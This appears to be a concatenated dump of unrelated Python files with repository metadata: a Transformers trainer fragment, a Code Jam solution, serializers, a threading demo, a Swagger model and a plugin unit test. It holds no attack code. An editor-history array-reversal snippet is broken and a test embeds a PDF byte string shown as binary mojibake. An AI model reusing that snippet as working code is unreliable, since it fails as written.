isinstance(dataloader.dataset, collections.abc.Sized): raise ValueError("dataset must implement __len__") prediction_loss_only = ( prediction_loss_only if prediction_loss_only is not None else self.args.prediction_loss_only ) model = self.model # multi-gpu eval if self.args.n_gpu > 1: model = torch.nn.DataParallel(model) # Note: in torch.distributed mode, there's no point in wrapping the model # inside a DistributedDataParallel as we'll be under `no_grad` anyways. batch_size = dataloader.batch_size num_examples = self.num_examples(dataloader) logger.info("***** Running %s *****", description) logger.info(" Num examples = %d", num_examples) logger.info(" Batch size = %d", batch_size) losses_host: torch.Tensor = None preds_host: Union[torch.Tensor, List[torch.Tensor]] = None labels_host: Union[torch.Tensor, List[torch.Tensor]] = None world_size = 1 if is_torch_tpu_available(): world_size = xm.xrt_world_size() elif self.args.local_rank != -1: world_size = torch.distributed.get_world_size() world_size = max(1, world_size) eval_losses_gatherer = DistributedTensorGatherer(world_size, num_examples, make_multiple_of=batch_size) if not prediction_loss_only: preds_gatherer = DistributedTensorGatherer(world_size, num_examples) labels_gatherer = DistributedTensorGatherer(world_size, num_examples) model.eval() if is_torch_tpu_available(): dataloader = pl.ParallelLoader(dataloader, [self.args.device]).per_device_loader(self.args.device) if self.args.past_index >= 0: self._past = None self.callback_handler.eval_dataloader = dataloader for step, inputs in enumerate(dataloader): loss, logits, labels = self.prediction_step(model, inputs, prediction_loss_only) if loss is not None: losses = loss.repeat(batch_size) losses_host = losses if losses_host is None else torch.cat((losses_host, losses), dim=0) if logits is not None: preds_host = logits if preds_host is None else nested_concat(preds_host, logits, padding_index=-100) if labels is not None: labels_host = labels if labels_host is None else nested_concat(labels_host, labels, padding_index=-100) self.control = self.callback_handler.on_prediction_step(self.args, self.state, self.control) # Gather all tensors and put them back on the CPU if we have done enough accumulation steps. if self.args.eval_accumulation_steps is not None and (step + 1) % self.args.eval_accumulation_steps == 0: eval_losses_gatherer.add_arrays(self._gather_and_numpify(losses_host, "eval_losses")) if not prediction_loss_only: preds_gatherer.add_arrays(self._gather_and_numpify(preds_host, "eval_preds")) labels_gatherer.add_arrays(self._gather_and_numpify(labels_host, "eval_label_ids")) # Set back to None to begin a new accumulation losses_host, preds_host, labels_host = None, None, None if self.args.past_index and hasattr(self, "_past"): # Clean the state at the end of the evaluation loop delattr(self, "_past") # Gather all remaining tensors and put them back on the CPU eval_losses_gatherer.add_arrays(self._gather_and_numpify(losses_host, "eval_losses")) if not prediction_loss_only: preds_gatherer.add_arrays(self._gather_and_numpify(preds_host, "eval_preds")) labels_gatherer.add_arrays(self._gather_and_numpify(labels_host, "eval_label_ids")) eval_loss = eval_losses_gatherer.finalize() preds = preds_gatherer.finalize() if not prediction_loss_only else None label_ids = labels_gatherer.finalize() if not prediction_loss_only else None if self.compute_metrics is not None and preds is not None and label_ids is not None: metrics = self.compute_metrics(EvalPrediction(predictions=preds, label_ids=label_ids)) else: metrics = {} if eval_loss is not None: metrics["eval_loss"] = eval_loss.mean().item() # Prefix all keys with eval_ for key in list(metrics.keys()): if not key.startswith("eval_"): metrics[f"eval_{key}"] = metrics.pop(key) return PredictionOutput(predictions=preds, label_ids=label_ids, metrics=metrics) def _gather_and_numpify(self, tensors, name): """ Gather value of `tensors` (tensor or list/tuple of nested tensors) and convert them to numpy before concatenating them to `gathered` """ if tensors is None: return if is_torch_tpu_available(): tensors = nested_xla_mesh_reduce(tensors, name) elif self.args.local_rank != -1: tensors = distributed_concat(tensors) return nested_numpify(tensors) def prediction_step( self, model: nn.Module, inputs: Dict[str, Union[torch.Tensor, Any]], prediction_loss_only: bool ) -> Tuple[Optional[float], Optional[torch.Tensor], Optional[torch.Tensor]]: """ Perform an evaluation step on :obj:`model` using obj:`inputs`. Subclass and override to inject custom behavior. Args: model (:obj:`nn.Module`): The model to evaluate. inputs (:obj:`Dict[str, Union[torch.Tensor, Any]]`): The inputs and targets of the model. The dictionary will be unpacked before being fed to the model. Most models expect the targets under the argument :obj:`labels`. Check your model's documentation for all accepted arguments. prediction_loss_only (:obj:`bool`): Whether or not to return the loss only. Return: Tuple[Optional[float], Optional[torch.Tensor], Optional[torch.Tensor]]: A tuple with the loss, logits and labels (each being optional). """ has_labels = all(inputs.get(k) is not None for k in self.label_names) inputs = self._prepare_inputs(inputs) with torch.no_grad(): if self.args.fp16 and _use_native_amp: with autocast(): outputs = model(**inputs) else: outputs = model(**inputs) if has_labels: loss = outputs[0].mean().detach() logits = outputs[1:] else: loss = None # Slicing so we get a tuple even if `outputs` is a `ModelOutput`. logits = outputs[:] if self.args.past_index >= 0: self._past = outputs[self.args.past_index if has_labels else self.args.past_index - 1] # Remove the past from the logits. logits = logits[: self.args.past_index - 1] + logits[self.args.past_index :] if prediction_loss_only: return (loss, None, None) logits = nested_detach(logits) if len(logits) == 1: logits = logits[0] if has_labels: labels = nested_detach(tuple(inputs.get(name) for name in self.label_names)) if len(labels) == 1: labels = labels[0] else: labels = None return (loss, logits, labels) def floating_point_ops(self, inputs: Dict[str, Union[torch.Tensor, Any]]): """ For models that inherit from :class:`~transformers.PreTrainedModel`, uses that method to compute the number of floating point operations for every backward + forward pass. If using another model, either implement such a method in the model or subclass and override this method. Args: inputs (:obj:`Dict[str, Union[torch.Tensor, Any]]`): The inputs and targets of the model. Returns: :obj:`int`: The number of floating-point operations. """ model = self._actual_model(self.model) if hasattr(model, "floating_point_ops"): return model.floating_point_ops(inputs) else: return 0 @staticmethod def _actual_model( model: Union[torch.nn.DataParallel, torch.nn.parallel.DistributedDataParallel, torch.nn.modules.Module] ) -> torch.nn.modules.Module: """ Args: model: (:obj:`Union[torch.nn.DataParallel, torch.nn.parallel.DistributedDataParallel, torch.nn.modules.Module]`): Model object used during training Returns: :obj:`torch.nn.modules.Module`: unwrapped module """ if isinstance(model, torch.nn.DataParallel) or isinstance(model, torch.nn.parallel.DistributedDataParallel): model = model.module else: model = model return model
efdbbaf125546b22e79da1e189dd44d713d68223
487ce91881032c1de16e35ed8bc187d6034205f7
/codes/CodeJamCrawler/16_0_2_neat/16_0_2_jolley_Pancakes.py
0f7c8e1f03d564dbbb9de3c313d22706fa0aea19
[]
no_license
DaHuO/Supergraph
9cd26d8c5a081803015d93cf5f2674009e92ef7e
c88059dc66297af577ad2b8afa4e0ac0ad622915
refs/heads/master
2021-06-14T16:07:52.405091
2016-08-21T13:39:13
2016-08-21T13:39:13
49,829,508
2
0
null
2021-03-19T21:55:46
2016-01-17T18:23:00
Python
UTF-8
Python
false
false
972
py
# -*- coding: utf-8 -*- """ Created on Sat Apr 9 18:01:19 2016 @author: jo """ with open('input', 'r') as f: cases = 0 case = 0 with open('outputPan', 'w') as fo: for line in f: if line[0].isdigit(): cases = int(line) #print(line) else: case +=1 last = True flips = 0 for c in xrange(len(line)): positive = True if line[c] == '-': positive = False if c == 0: last = positive else: if positive != last: flips +=1 if c == (len(line)-1): if positive != True: flips += 1 fo.write('Case #' + str(case) + ': ' + str(flips) + '\n') last = positive
b59c437e9488ef3d05b937ed48797e71bc060614
fe54d59a1a030a9c1395f4f4d3ef2e2b2ec48343
/build/lib/nailgun/objects/serializers/node.py
a2db68ad18b2230ba9ca3569cf67682031e2d880
[]
no_license
zbwzy/nailgun
38a4198a0630a1608c14e55bee03b5ed04ded3e8
2eaeece03ebc53f48791db2aa8e7d24c010910f2
refs/heads/master
2022-09-25T09:03:33.296368
2016-02-23T09:32:55
2016-02-23T09:32:55
52,345,460
0
0
null
2022-09-16T17:45:43
2016-02-23T09:03:07
Python
UTF-8
Python
false
false
2,488
py
# -*- coding: utf-8 -*- # Copyright 2013 Mirantis, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nailgun import consts from nailgun.objects.serializers.base import BasicSerializer class NodeSerializer(BasicSerializer): fields = ( 'id', 'name', 'meta', 'progress', 'kernel_params', 'roles', 'pending_roles', 'status', 'mac', 'fqdn', 'ip', 'manufacturer', 'platform_name', 'pending_addition', 'pending_deletion', 'os_platform', 'error_type', 'online', 'cluster', 'network_data', 'group_id', 'node_type' ) class NodeInterfacesSerializer(BasicSerializer): nic_fields = ( 'id', 'mac', 'name', 'type', 'state', 'current_speed', 'max_speed', 'assigned_networks' ) bond_fields = ( 'mac', 'name', 'type', 'mode', 'state', 'assigned_networks' ) @classmethod def serialize_nic_interface(cls, instance, fields=None): return BasicSerializer.serialize( instance, fields=fields if fields else cls.nic_fields ) @classmethod def serialize_bond_interface(cls, instance, fields=None): data_dict = BasicSerializer.serialize( instance, fields=fields if fields else cls.bond_fields ) data_dict['slaves'] = [{'name': slave.name} for slave in instance.slaves] return data_dict @classmethod def serialize(cls, instance, fields=None): iface_types = consts.NETWORK_INTERFACE_TYPES if instance.type == iface_types.ether: return cls.serialize_nic_interface(instance) elif instance.type == iface_types.bond: return cls.serialize_bond_interface(instance)
eeb5c32aeca4c54f2b5c6ffc35714485bb235f96
7174b27cd79cad398ffa1add9b59da6e9adbeae4
/python-100days/day0-15/day13/more_thread2.py
35152bd4993d043a4da4ce465dc7221aa7d7ba44
[]
no_license
UULIN/py
ddf037021afce04e46d51c133bfa06257ef7200a
a5d32597fc91fbd5ec41f54fb942c82300766299
refs/heads/master
2021-07-18T08:20:49.342072
2020-10-21T14:41:42
2020-10-21T14:41:42
222,977,134
1
0
null
null
null
null
UTF-8
Python
false
false
1,226
py
from time import sleep from threading import Thread, Lock class Account(object): def __init__(self): self._balance = 0 self._lock = Lock() def deposit(self, money): self._lock.acquire() try: # 计算存款后的余额 new_balance = self._balance + money # 模拟受理存款业务需要0.01秒的时间 sleep(0.01) # 修改账户余额 self._balance = new_balance finally: self._lock.release() @property def balance(self): return self._balance class AddMoneyThread(Thread): def __init__(self, account, money): super().__init__() self._account = account self._money = money def run(self): self._account.deposit(self._money) def main(): account = Account() threads = [] # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): t = AddMoneyThread(account, 1) threads.append(t) t.start() # 等所有存款的线程都执行完毕 for t in threads: t.join() print('账户余额为: ¥%d元' % account.balance) if __name__ == '__main__': main()
ae02b14171429a5182162ab7f4da4271b917afb0
5f6c16e89cf58304c2e70f1e34f14110fcec636c
/python-swagger-sdk/swagger_client/models/inline_response2006.py
07fbec9fdc5ad9c1c909603b3c658606843c2559
[]
no_license
mohammedpatla/secretapi
481c97901a5e92ca02e29470ab683df80ea0f26a
df420498bd0ae37fd1a152c3877a1342275a8f43
refs/heads/master
2022-12-25T01:55:18.038954
2020-10-04T23:13:54
2020-10-04T23:13:54
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,041
py
# coding: utf-8 """ API for Secret Network by ChainofSecrets.org A REST interface for state queries, transaction generation and broadcasting. # noqa: E501 OpenAPI spec version: 3.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class InlineResponse2006(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'inflation_rate_change': 'str', 'inflation_max': 'str', 'inflation_min': 'str', 'goal_bonded': 'str', 'unbonding_time': 'str', 'max_validators': 'int', 'bond_denom': 'str' } attribute_map = { 'inflation_rate_change': 'inflation_rate_change', 'inflation_max': 'inflation_max', 'inflation_min': 'inflation_min', 'goal_bonded': 'goal_bonded', 'unbonding_time': 'unbonding_time', 'max_validators': 'max_validators', 'bond_denom': 'bond_denom' } def __init__(self, inflation_rate_change=None, inflation_max=None, inflation_min=None, goal_bonded=None, unbonding_time=None, max_validators=None, bond_denom=None): # noqa: E501 """InlineResponse2006 - a model defined in Swagger""" # noqa: E501 self._inflation_rate_change = None self._inflation_max = None self._inflation_min = None self._goal_bonded = None self._unbonding_time = None self._max_validators = None self._bond_denom = None self.discriminator = None if inflation_rate_change is not None: self.inflation_rate_change = inflation_rate_change if inflation_max is not None: self.inflation_max = inflation_max if inflation_min is not None: self.inflation_min = inflation_min if goal_bonded is not None: self.goal_bonded = goal_bonded if unbonding_time is not None: self.unbonding_time = unbonding_time if max_validators is not None: self.max_validators = max_validators if bond_denom is not None: self.bond_denom = bond_denom @property def inflation_rate_change(self): """Gets the inflation_rate_change of this InlineResponse2006. # noqa: E501 :return: The inflation_rate_change of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._inflation_rate_change @inflation_rate_change.setter def inflation_rate_change(self, inflation_rate_change): """Sets the inflation_rate_change of this InlineResponse2006. :param inflation_rate_change: The inflation_rate_change of this InlineResponse2006. # noqa: E501 :type: str """ self._inflation_rate_change = inflation_rate_change @property def inflation_max(self): """Gets the inflation_max of this InlineResponse2006. # noqa: E501 :return: The inflation_max of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._inflation_max @inflation_max.setter def inflation_max(self, inflation_max): """Sets the inflation_max of this InlineResponse2006. :param inflation_max: The inflation_max of this InlineResponse2006. # noqa: E501 :type: str """ self._inflation_max = inflation_max @property def inflation_min(self): """Gets the inflation_min of this InlineResponse2006. # noqa: E501 :return: The inflation_min of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._inflation_min @inflation_min.setter def inflation_min(self, inflation_min): """Sets the inflation_min of this InlineResponse2006. :param inflation_min: The inflation_min of this InlineResponse2006. # noqa: E501 :type: str """ self._inflation_min = inflation_min @property def goal_bonded(self): """Gets the goal_bonded of this InlineResponse2006. # noqa: E501 :return: The goal_bonded of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._goal_bonded @goal_bonded.setter def goal_bonded(self, goal_bonded): """Sets the goal_bonded of this InlineResponse2006. :param goal_bonded: The goal_bonded of this InlineResponse2006. # noqa: E501 :type: str """ self._goal_bonded = goal_bonded @property def unbonding_time(self): """Gets the unbonding_time of this InlineResponse2006. # noqa: E501 :return: The unbonding_time of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._unbonding_time @unbonding_time.setter def unbonding_time(self, unbonding_time): """Sets the unbonding_time of this InlineResponse2006. :param unbonding_time: The unbonding_time of this InlineResponse2006. # noqa: E501 :type: str """ self._unbonding_time = unbonding_time @property def max_validators(self): """Gets the max_validators of this InlineResponse2006. # noqa: E501 :return: The max_validators of this InlineResponse2006. # noqa: E501 :rtype: int """ return self._max_validators @max_validators.setter def max_validators(self, max_validators): """Sets the max_validators of this InlineResponse2006. :param max_validators: The max_validators of this InlineResponse2006. # noqa: E501 :type: int """ self._max_validators = max_validators @property def bond_denom(self): """Gets the bond_denom of this InlineResponse2006. # noqa: E501 :return: The bond_denom of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._bond_denom @bond_denom.setter def bond_denom(self, bond_denom): """Sets the bond_denom of this InlineResponse2006. :param bond_denom: The bond_denom of this InlineResponse2006. # noqa: E501 :type: str """ self._bond_denom = bond_denom def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(InlineResponse2006, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, InlineResponse2006): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
eccf709bc85d1da00c645964d906df42ca0dd0af
52b5773617a1b972a905de4d692540d26ff74926
/.history/reverseA_20200714202827.py
c8528cea3532a5e29a64703e1b1f20412489e57a
[]
no_license
MaryanneNjeri/pythonModules
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
f4e56b1e4dda2349267af634a46f6b9df6686020
refs/heads/master
2022-12-16T02:59:19.896129
2020-09-11T12:05:22
2020-09-11T12:05:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
282
py
''' Given array A consisting of N integers, return the reversed array ''' def array(arr): i = 0 j = len(arr)-1 while i < len(arr)-2 and j > 0: temp = arr[i] arr[i] = arr[j] arr[j] = temp i +=1 j -=1 arr([1, 2, 3, 4, 5, 6])
c2901094b0c4b4a53907e0010cd8c43666a720bb
c9500ad778b8521aaa85cb7fe3239989efaa4799
/plugins/get_url/unit_test/test_get_file.py
1b7ecf108a88e562d02711af4289979fc0778ff2
[ "MIT" ]
permissive
rapid7/insightconnect-plugins
5a6465e720f114d71b1a82fe14e42e94db104a0b
718d15ca36c57231bb89df0aebc53d0210db400c
refs/heads/master
2023-09-01T09:21:27.143980
2023-08-31T10:25:36
2023-08-31T10:25:36
190,435,635
61
60
MIT
2023-09-14T08:47:37
2019-06-05T17:05:12
Python
UTF-8
Python
false
false
37,536
py
import os import sys from unit_test.util import Util sys.path.append(os.path.abspath("../")) from unittest import TestCase from komand_get_url.actions.get_file import GetFile from komand_get_url.actions.get_file.schema import Input from unittest.mock import patch from insightconnect_plugin_runtime.exceptions import PluginException sys.path.append(os.path.abspath("../")) @patch("urllib.request.urlopen", side_effect=Util.mocked_request) @patch("insightconnect_plugin_runtime.helper.open_cachefile", side_effect=Util.mock_for_cache_creation) @patch("komand_get_url.util.utils.Utils.create_url_meta_file") class TestGetFile(TestCase): @classmethod def setUpClass(cls) -> None: cls.action = Util.default_connector(GetFile()) def test_get_pdf_file(self, mock_get, mock_create_url, mock_cach): actual = self.action.run({Input.URL: "https://test.com/v1/test.pdf", Input.IS_VERIFY: False}) expected = { "bytes": "%PDF-1.5
%����
3 0 obj
<< /Linearized 1 /L 15007 /H [ 678 125 ] /O 7 /E 14477 /N 1 /T 14726 >>
endobj
                                                                                                                 
4 0 obj
<< /Type /XRef /Length 50 /Filter /FlateDecode /DecodeParms << /Columns 4 /Predictor 12 >> /W [ 1 2 1 ] /Index [ 3 14 ] /Info 1 0 R /Root 5 0 R /Size 17 /Prev 14727                 /ID [<4dac181eb10e569cb7930abd3bbd36e1><f8f4a6b9f7562a333372614367963140>] >>
stream
x�cbd�g`b`8	$��XF@���*��	=��.�w 	F4 �.
endstream
endobj
                                                                     
5 0 obj
<< /Pages 14 0 R /Type /Catalog >>
endobj
6 0 obj
<< /Filter /FlateDecode /S 36 /Length 48 >>
stream
x�c```e``Z� �Yp e31B�����R���v�a  ���
endstream
endobj
7 0 obj
<< /Contents 8 0 R /MediaBox [ 0 0 595.276 841.89 ] /Parent 14 0 R /Resources 12 0 R /Type /Page >>
endobj
8 0 obj
<< /Filter /FlateDecode /Length 118 >>
stream
x�mͻ�0F�=O�b��iV$��C����P���S.#�w��1�ڡP��KO6t��3CY�Cw[�2tO�=E
 �����Bu��M���4����!$ePH�^�� or[s/��"�
endstream
endobj
9 0 obj
<< /Filter /FlateDecode /Length1 1578 /Length2 10778 /Length3 0 /Length 11818 >>
stream
x���T�۲-�5�KC�������@h�qN�	�����]��#{�{�>���xo0F�ͪY��j�Z��Lb��@i0����� ����
`e�`feeG���A��2#Sk�]@`�$��f�W��䕧� Ȼ��8 l��l<��� vVV��!:8�$��@� %f���L-���������?� :z �_� 1{�3��P2�� �_O�0�h8X����JA'h�8򳰸��3�ٻ0;8[�3�A�:�����i�lf��3fdj����o������x5؁,�`��W�%��z8@CN���MV�����l l�l�N���?�@࿂�,,���� �5�
d�H+2C< � 3�������k���������W�f i15��k��j����qav��i��O��)K�-%��`���$A�@�ױ{��}���`�+���O���,Z`��+PN�_�W�l�@������� t =,lX����t��d�c~������`���d|����b�@�]����t�7BfcX�,  s�5����f������A �W��X������U^�`;�����_i9=u��;��O\������
`b�b������Q5����ʁ� |W�:�����_���r��;��ëj� ���ܐ��������Y����)�O�����wAҮvv������f� ;�^E�
y] %��5 �o���UZ�\���Wb��b`k���"� Z�� 6��o�֟-����.�?�
���j���u�,>�>.����|ݜ�>R
l�`�g�ع�f��f�ȯ���� �l��h	��K� f��5�ڞ/����ύ�� X����B*`��d� ��,V���^ ��? '���ߐ��y:ڼ>&�a����`��|�0�Ȝ| ��G�����_Os�Gi��{��kZ��ί�_z~���^' �h��8�`!l[�r[%F�δ=&4M���J�����z���D_���|-�4؅��)Ew%�D��}�X��)A�����$N}r�ya�o<�P�{/)	���ϓ��v��F�vy�\'W^t�/ط�=2�{K�GB��v*�PK����"��P�g�P�C�H�c�y�������!��c@�=��(��_g����Z-�dw� �"�' �������K�ǟ�.*X�[�h, �AcLYa�`�cϨ�G�뻫�F�ضr� ���}�[	���8&Δ*���&ؐj�@ҽ6+�Ֆk�N+��%���/�4=�C��N�Z����>��Д������N_�o"�"$��l�l�W��3HS�J �o:t�r8�KnI��pf!�ށ���Dl�����p��#$'\�>�Ѿ�ug�m�3��v�XFA/A��/��)gg��6R���tyR���~�Ъ	� �f�JX����%�=��7����
8�d���+�=m���2�h�k5�r}U��:�`ݫ
�Ỷ�۸.-7��wо;+w�������M�?��E%MF,�M���l7���cMq7
����:�B������%r�Դ�J�
���|�$�	��E�>_���״���A�fb�FSg�,ü3i��>&'�м���k�{~jt�bxr��ۮ��gO@�+2�.��b~�?�rM�.2��*�᧖�X�Iu�Lp�h`V�B++��ؑ, ��6�b��\B��W��=yL�P��a�O�+��R!�=h�5I�0����G)�<5p)qz8���z.1�b~Y�
�� ;��f�=E�U�n ��f"Ԧ�,-�@ML�:�*�TE05&-������Jf�Ş	�1(yH	M�7|,w5� ���9�Y����!t�ykwJi���s�0*�ʗ 5��ݱ�Iӏ?���X�}�^���Ok��2ڜ��^+��G�����$4��I>�C1Ʌ3Hj���P�d�%�����B-�E�Nkl�uVpe��xHג������B�k&�}�=	��?Z�Q�9��65�p�p�Qd���5}�:�^��۷cAĺFZz�$����Z6��ͽF�8gx�x��4�N�A(t���9�����@p0H�Ɉ/3��m&�/.�݊LF�L��@�ͮ�:��R�-�JEe��_�����n�Ap8���'B$T��a��N4���t#?B�����Q������k|Z�������z��J'_��Ǌ�Dz�*$�Y����2<�΁�ӈoF���~ �k��&�P�Z*J4d�-�\ύ��{���:Q(ZNUl;~�b�f���}L�ߩ���uGu|7q��O�S�>9�����/v#���5@�ɓ����[׽<q�ix|�:6tądK��O����� Ri��`E0�ƅ;M1��tUe���m��� m���S�ܣ��}���
 =�F��b�TW�A3@�tt`�#Z�3ZN�_n�bNͺ�
���4��'/a-���;ˮ�ZU�=��L[�^C\�eG���D"[���M��@��p
ݻ�]8�4|<%bT*T0����C<fg�&>ݖ���s�g?%��̵g��V4�-��n���j��3H69��
�aK��9y�O�wi�o���'dz��V`��^���#������J�J)��+����1:�$������+� BƼӀ��Nձ��
Z����aJZU���Za'�=na	L�t��0��/��V�i��\���!��������l�\��c�#M켉o�j7s�&�V��D�k�fn�^�Z��&U9�8}��ld�K����*c����C�WKF���8�����ZFæ�Ѱ*T�U��A�-���sdAGݡ!�9B�B뢔���
ҷ�y��qm��vtv��YK�S�Q�{%�ɳÆ����8���F>J�6���� �]�?q��� �{�u""����#Q��"4��<+qF	/�R�,��$��G%�z�I[�&������$�#�Rw!���}�:��-&F0����s���nݭ��|-������vM�� �3!n:	�8�d�M�%�����%&[0�����|a��Ѹ�
as-/�Bug6�����n��`��(�lH$GjVQz)�(�>n�
0�8�{b�m� �rIU���%�b�䘬4&����:���#C��Ǟ<a3]�ue�te8�\���8c�����Fvh�\���`Mu	Ĝ ��a��?��KYX?��E�yh{^�-aNfQ���H������-�44.�z����Y��3.�AO�\���Rb)�j���*��i��3	v��t�(�ʗ���
,�˺����1�޷���%m�bc���t�	��ĠIH��h��Yo��UK�.pPm�٘��*�m����h�Q��;ҏr��Mk�YN�v伤sǯ�Xp4�2}՟XO.
o��iL��B���Ul煲C5îs�]��w��g��u�R�0{hT���4��*K��gI�Z5R�`��ZR�����&�yԞ�2���䫒iP~���w�&��JD���#炌���^�c='�oK�	jA�͂�'����c��ZR_�.�#Ϧ�:f��F���	C뫉���[\�P�zI��0(���i{̵g�V����,�u���>��u��YKc���`���P�E�kvs�'ґ��I���֖ό?d���|�;6U��j��l���������q���Ҵ�3�7[*�����ˉKNW��X�}Z�P�͐�ՙC���w��
"��y�7�"������S�V|0ʺ�c���j�%Ӥ�u��L���c;,V�[;lT�Ə��{�̃=�?����<�܂��Ԉ{U}�	��.�6ӂ����j�S�.��W
^��|{���O��Ȉ�<��Hz��F�Crޤ���9���% �'g�Q���ՇK'���ݟK���Zݪzp�ˆ��� �<�
,ː��`�aSr���Z�|ܹ�%kH9]j ˖<�vl��|�W�(��#�,�tY��s�Ú�w��#:Dؠb�w4Aƥ�!��\��ψ�&��޳�TG�6�o�u�S�أ.nL�.nf�~���$w^/���K�[%����2�i8vts��:b��������<
ߟ��'��4:$�%[sj��T�k�vߎ@���[��f��H�E�����&���+]�hm*��1e8&E4prD���O<c��ek�����x}1Q�dU�E
�~�q{~t��W�5 '�ٵ�9ƅ�~����uWWp�%��AH�j�xſ����=��(�$E�*3$0ք����&��?�&m�Y6�@�`�1xa�5 b�(�����%JAv���q�*ي��b��`� ������8�F�}��T>Yii(8Ɏ�|��
��	8���b�̥������^^�i.�\���8]������۳���G0I1���tt uG1-�8��]4�C�@�gQ U�pD��!$�8"gD��vxw9݄i�>b��hS�Ǵ�Q���ӌ���'S<;!@�Eb[<���"����6IG�|�'���T?()k��Ʀ�3n��J2�s����\ee�����%����w��K�U�Xz��-i����z�/�rP��4ɂ/p-�'�@70/v@�t ��vu	G�Y���g�&��4N��W�3��@�q��ϿX�|9֒3��7)e��1�wi��\&f�uu��|����zꢌQ�g�mG�)d�N#Td_G��M�~D�}����ېop�C�	0Zy�L��P�v�V�F$�+M0X�����x���\4�� )ݬ�֟	'M��"<t��A�V��"���ۻe��	�����)���7�
�&Z9��'��j���Ǽ�iծ�#��/�R���Bc�f{�(6�*`L��O26o�Q�y]=W��/�W/�\��|-���:=?R<��f��v�k1�C�Ar�w@���m*!=�t&@��}Ri��g�	x<�2׽�&��_�=^A�!����1Z�nPdh^�����Q���ʚ?8�*t�EZ�q��o�9�oHA��+�V�AOԙ3���h��홱hG56�$�G�<�	x��]�I|/�߯3�Q)��e"��p[��V���9��5�q�������f� )��ϰcUb�gCEz_�m$z�tg�`<�(�p-�U
�����%��t*V�a%���	r-��Z��h�<=���s��'���揉Z�$CP/�Y$�A0Q�Jbq�7��J��l6��f��� j��)�c�h*��Rm�[&�P	2�x�A����V�.����K�[�\�E���YU�����xW�{�^C�S�>���n�x~o&[�E���"������V��l�9��J�^mz��7�	K��䃩�YV� Z�A�X8��TۈT��.w�N�#32b�<�Ѕ�Y0>���P������m�^?��;�:?�Ҷ��\�SY��ѽ�+�D�.#���"�vy���'i�>��*�
Lk���L��������4�7�>~~�;��6��H��*�a���gp�%R��7-���K��Q���X�Z���4�nl�{�Ն���7��[�X_�p��u�rɦ�~ɘ�H7�pR:�d�j_~D�)����>��˿L��f�i**����Uda�<)����s�.���'��;��kq�$������b���ѷd��_ݔ��5x�;���*I��Nm��Hi����QJw����������󶩸�j4�4�0?�[&�PLy��v�+�5N{}t�}�'�o�-�8�Ȱ��[&�n��P�T�;xm�����N���+X�"��q�J���SZ��Ա1�Rj	~��2���p�X[R~�'��I����7	���>���=+��7�_�U}��)�[��ߍ�i�֣K���=��$�����!u��${�d]g�_�z�&Ri��8�<�5D�s\�k��ؚc/S7@��X���T^N2I��tzU5·�o��t���e��p9�a��MH`0*��b������:�.dgFO�w�h��.H���*�� h�v��V��7۬����rZ5JK���,3/|�|Co�7�Dv�}bD	�Wn����]y������ꚹ>�h�2D�� 9~~���e�/��$ã3*F+�'�V7���S���[�9n9C��ݕk�G�Am��7�³�|��X}��)�pO9�����]��3�`F�C�T׊��b�x�>jd޻�W�Yc��:��[ھ+h�\��Ap�G)�lqq@cj�GV���٤,�Q���f��~�������Gq�V;���ߪd־�[��i�ܙ
{�aܜ�w����G�LÕ�xd�$xGK��wo}��!m�l�}b�����τ#�n]�
�>�H�!�I�?cc3�S3ԂkV~
ju���.-�X0\S�W#+7��kp��u~��*ɦ����n���߲�el^�Ӌ�LW�
�_v�G���b��L�\ޭ�U XJ��" f)'Al����d���2��x;����I�~4@��p~U�@c[5b�B�D�6��g����Ԉ�)��*O'~%ٱޖ� S�� ��RܼQ����*,(�svjA�Ɲ��;06ƿ�6�G������[���,tt�&�݃���F���^þ�F�B�&��x��4-j��j����oT�tT�K�-�~��R�Χ�U��*�T�H�PCVF�B�Y�v4t:��� h���d�ߙO�"���C��.!H�UN��n����e�p{g�+��	-Q/ˡ��F��bA�1���AC�ћ��y~��׺q�I���42X"��}�����%�R8'Kb<cQ?`o��&�T@���D_��Wk��X�J���g�Gm�=�
�PDEh
]�v��m�췱����e⤊�s>��t��*�br�*�=�Yh�PQ��m�A_	W�)��`�i��<ܪx+]�M.j�����;Y�!zCCU�&��OM�^a�E��TM��*U�v�N�RHLM�s�t� n<6|�n���NU ��kID��x/��1+��V+���D�`��b��n��v�'O@~�#�Ǆ��g^]˚a�5���N�i|���)~�"�j.�����/O���7�hTkmD��"C�,��+Zb]��Vq���{���[�,TQ�]�.�
��H��Du��m�"?��:m�T��/�Ķ��~u��/�n��[��ZĂe�c��ٱ�;U��$ �۔��s����.�C*�?GA�Q�0T�M{��cԲ9S���9��2�3�����L���\��]ĸ�>:͡�F��Y�j��i���ΔoWU|6�B)f�
